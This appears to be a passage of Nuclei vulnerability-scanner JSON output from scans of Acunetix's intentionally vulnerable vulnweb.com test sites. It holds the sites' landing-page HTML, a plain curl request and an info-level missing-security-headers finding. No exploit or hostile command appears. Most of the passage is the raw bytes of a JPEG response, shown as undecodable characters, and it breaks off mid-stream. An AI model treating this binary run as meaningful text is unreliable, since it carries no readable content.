type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:45.427250836Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd 